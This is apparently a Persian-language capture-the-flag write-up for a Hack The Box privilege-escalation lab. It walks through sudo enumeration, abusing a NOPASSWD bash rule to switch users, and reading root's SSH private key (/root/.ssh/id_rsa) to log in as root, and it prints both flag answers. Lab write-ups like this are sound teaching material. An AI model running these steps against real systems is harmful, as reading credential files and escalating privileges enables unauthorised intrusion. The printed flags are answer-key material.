خلاصه: چگونه یک آزمایشگاه افزایش امتیازات را در هک جعبه حل کنیم

گاهی اوقات حل و فصل یک آزمایشگاه تشدید امتیازات پیچیده تر از آنچه هست به نظر می رسد. این راهنما شما را گام به گام راهنمایی می کند تا چالش را بدون سرگیجه کامل کنید.

درس کلیدی: راه حل اغلب ساده تر از آن چیزی است که فکر می کنید، بنابراین همیشه با اصول اولیه شروع کنید.

مرحله 1: به سرور متصل شوید

اولین کاری که باید انجام دهید این است که با استفاده از اطلاعات کاربری ارائه شده به سرور متصل شوید:

ssh user1@ -p 

محیط اولیه خود را بررسی کنید:

• شما کی هستید؟: از whoami برای پیدا کردن کاربر فعلی استفاده کنید.
• کجا هستید؟: برای اطلاع از موقعیت مکانی خود در سیستم از pwd استفاده کنید.
• اطراف شما چیست؟: از ls ​​-la برای مرور فایل های دایرکتوری خود استفاده کنید.

مرحله 2: مجوزها را با sudo فهرست کنید

پس از اتصال، بررسی کنید که چه مجوزهایی به عنوان کاربر اولیه دارید. این مرحله برای کشف مسیرهای احتمالی صعود کلیدی است:

sudo -l

به دنبال چیزی شبیه به این باشید:

(user2 : user2) NOPASSWD: /bin/bash

این نشان می دهد که می توانید /bin/bash را به عنوان user2 بدون رمز عبور اجرا کنید. اگر چیزی مشابه دیدید، در مسیر درستی هستید!

مرحله 3: به user2 تغییر دهید

برای تبدیل شدن به user2 از مجوزهای کشف شده در مرحله قبل استفاده کنید:

sudo -u user2 /bin/bash

بررسی کنید که اکنون به عنوان user2 کار می کنید:

whoami

مرحله 4: اولین پرچم را پیدا کنید

به عنوان user2، فایل flag.txt را در دایرکتوری این کاربر پیدا کرده و بخوانید:

cat /home/user2/flag.txt

HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}

تبریک می گویم! شما قبلاً اولین پرچم را دارید. حالا بریم سراغ دسترسی روت.

مرحله 5: امتیازات را برای روت افزایش دهید

هدف نهایی دستیابی به دسترسی ریشه است. در اینجا یک استراتژی ممکن است:

فایل اصلی کلید SSH را پیدا کنید:

cat /root/.ssh/id_rsa

اگر به این فایل دسترسی دارید:

محتویات آن را کپی کرده و در فایلی به نام id_rsa در دستگاه محلی خود ذخیره کنید. برای این شما می خواهید بنویسید

vim id_rsa

شما محتویات فایل را پیست کرده و wq را تایپ کنید تا تغییرات ذخیره شده و خارج شوید.

مطمئن شوید که فایل دارای مجوزهای صحیح است:

chmod 600 id_rsa

برای اتصال به سرور به عنوان روت از کلید استفاده کنید:

ssh root@ -p  -i id_rsa 

مرحله 6: پرچم ریشه را پیدا کنید

اکنون که root هستید، به پوشه /root بروید و فایل flag.txt را بخوانید:

cat /root/flag.txt

HTB{pr1v1l363_35c4l4710n_2_r007}

آزمایشگاه آماده است!

افکار نهایی
این آزمایشگاه چیز مهمی را به ما می آموزد: بسیاری از اوقات، مؤثرترین راه حل نیز ساده ترین است. قبل از اینکه با استراتژی های پیشرفته پیچیده شوید، به یاد داشته باشید:

• اصول اولیه را فهرست کنید: با دستورات ساده مانند sudo -lo ls -la شروع کنید.
• گزینه های واضح را کاوش کنید: قبل از جستجوی ابزارهای خارجی از آنچه در حال حاضر دارید استفاده کنید.
• بعد از هر چالش فکر کنید: هر تجربه فرصتی برای بهبود است.
• اکنون نوبت شماست که از این دانش استفاده کنید و با اعتماد به نفس چالش های جدید را انجام دهید!